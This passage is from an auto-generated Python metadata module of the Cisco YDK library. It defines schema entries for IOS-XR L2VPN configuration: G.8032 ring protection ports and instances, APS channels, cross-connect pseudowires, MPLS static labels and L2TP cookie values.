[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Associates a set of VLAN IDs with the G
.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Vlan IDs in the format of a-b,c,d,e-f,g
,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
